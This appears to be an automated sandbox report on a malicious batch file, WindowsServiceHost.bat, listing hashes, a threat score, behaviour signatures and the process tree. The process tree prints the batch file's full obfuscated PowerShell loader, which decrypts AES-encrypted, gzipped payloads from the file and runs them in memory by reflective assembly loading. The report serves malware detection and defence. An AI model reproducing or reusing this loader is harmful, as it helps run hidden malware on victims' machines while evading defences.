Analysis
-
max time kernel
12s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
21-01-2025 22:47
Static task
static1
Behavioral task
behavioral1
Sample
WindowsServiceHost.bat
Resource
win7-20241010-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
WindowsServiceHost.bat
Resource
win10v2004-20241007-en
17 signatures
150 seconds
General
-
Target
WindowsServiceHost.bat
-
Size
261KB
-
MD5
14be533a8ded237f42b2ddc0d33b276d
-
SHA1
7293f45cd1cd11f4917f5a8abbad7fffaadbef7d
-
SHA256
0a7fd6f7e41112d69cab8548e2eb9b6605c43a31a6d69742588c91e96a23b5e1
-
SHA512
2fa1c126da6765ab7da7663b98498a299f5d4e4c1e92a155add0040ed3e45b32e5285c88d829dc1b87394e08bf8bdba6e1c62de5c749824c69a576d3981c8b1d
-
SSDEEP
6144:vGnTkbwrZjfz5/vhQnFZTsEmGTNsqrldr31ITpjnFyAKu+:unQbwlz5/enr/vdOTRnFJV+
Score
6/10
Malware Config
Signatures
-
pid Process 2704 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2704 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2704 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1084 wrote to memory of 2704 1084 cmd.exe 31 PID 1084 wrote to memory of 2704 1084 cmd.exe 31 PID 1084 wrote to memory of 2704 1084 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\WindowsServiceHost.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UXWEpd7nUOKlq+WXHTQepEFwM+Cpm4ywcY0Yh+bUqRw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gVgKzo1cs7k4M/3z+UgL1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fWEZS=New-Object System.IO.MemoryStream(,$param_var); $CzfBd=New-Object System.IO.MemoryStream; $CPqAb=New-Object System.IO.Compression.GZipStream($fWEZS, [IO.Compression.CompressionMode]::Decompress); $CPqAb.CopyTo($CzfBd); $CPqAb.Dispose(); $fWEZS.Dispose(); $CzfBd.Dispose(); $CzfBd.ToArray();}function execute_function($param_var,$param2_var){ $fEGTa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ruNtC=$fEGTa.EntryPoint; $ruNtC.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\WindowsServiceHost.bat';$DUsFS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\WindowsServiceHost.bat').Split([Environment]::NewLine);foreach ($nMUEb in $DUsFS) { if ($nMUEb.StartsWith(':: ')) { $fkaFD=$nMUEb.Substring(3); break; }}$payloads_var=[string[]]$fkaFD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704
-